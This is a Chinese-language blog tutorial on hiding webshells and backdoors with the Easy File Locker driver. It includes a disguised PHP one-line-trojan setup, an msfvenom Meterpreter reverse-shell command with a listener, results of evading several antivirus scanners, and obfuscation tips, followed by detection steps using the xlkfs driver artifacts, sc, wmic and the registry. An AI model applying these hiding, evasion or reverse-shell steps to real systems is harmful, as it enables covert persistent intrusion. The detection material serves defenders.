简单介绍:
驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html
一般做黑链的小朋友都会这样设置:只勾选可读,其他的一律拒绝……那么,会有这样的效果,该文件不会显示,不能通过列目录列出来,也不能删除,除非你知道完整路径,你才可以读取文件内容。
并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界面、卸载程序等都可以删除,只留下核心的驱动文件就行了。
php后门测试:
先写一个用于包含的文件test.php,用于包含shell文件1111.jpg
再写一个shell文件,里面是一句话木马
添加需要隐藏的文件,如1111.jpg
4个选项,选中的分别为可访问、可读写、可删除,未选的为可视化(隐藏)
之后发现文件目录下的1111.jpg消失了,即使是打开显示所有的隐藏文件,都无法看到
访问测试,shell运行成功
使用工具进行后门排查:
使用安全狗进行网站安全扫描,未发现shell文件1111.jpg,并且判断test.php无危害
D盾_webshell查杀工具扫描,未发现shell文件
上火绒,360安全卫士依然未发现
当然,日志中记录了相关的访问记录,例如使用360星图分析apache日志,就能发现一些痕迹
备注:
对php后门进行了一些测试,最好是使用包含,直接隐藏php文件不可解析(推测是动态语言受限制,html文件可以解析),无法配合ADS隐藏文件进行使用。
关于工具爆出的可疑脚本test.php 可以在包含脚本test.php里面使用16进制编码以及各种嵌套来迷惑开发人员,当然还有各种配合使用的隐藏方法,就看你有多少想象力了
exe后门测试:
使用msf写一个反弹shell的后门:
`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f exe -o /root/shell.exe`
msf中设置监听
use exploit/multi/handler
上线成功
对shell.exe文件使用工具进行隐藏,不影响后门的上线
后门排查:
可以看到,虽然shell文件被隐藏,但是进程还在
命令:wmic
然后输入:process
依然可以看到进程文件位置
上火绒扫描,直接干掉
排查思路:
当我们发现了后门文件的痕迹,但是无法找到文件时,就可以猜测,是否是使用了驱动觐见隐藏
这些是典型特征
c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys
使用everything搜索,发现存在特征
命令tasklist与services.msc查看进程与服务时,查不到该进程和服务
使用D盾_webshell工具检测进程无发现
上火绒🗡,进程无发现,但是在驱动中发现了xlkfs
也可以使用sc进行查询
SC命令,是用来与服务控制管理器和服务进行通信的命令行程序。
sc query xlkfs //query-----------查询服务的状态
sc qc xlkfs 查询服务配置信息
在注册表中检查服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
命令net stop xlkfs 停止服务
隐藏的文件显示出来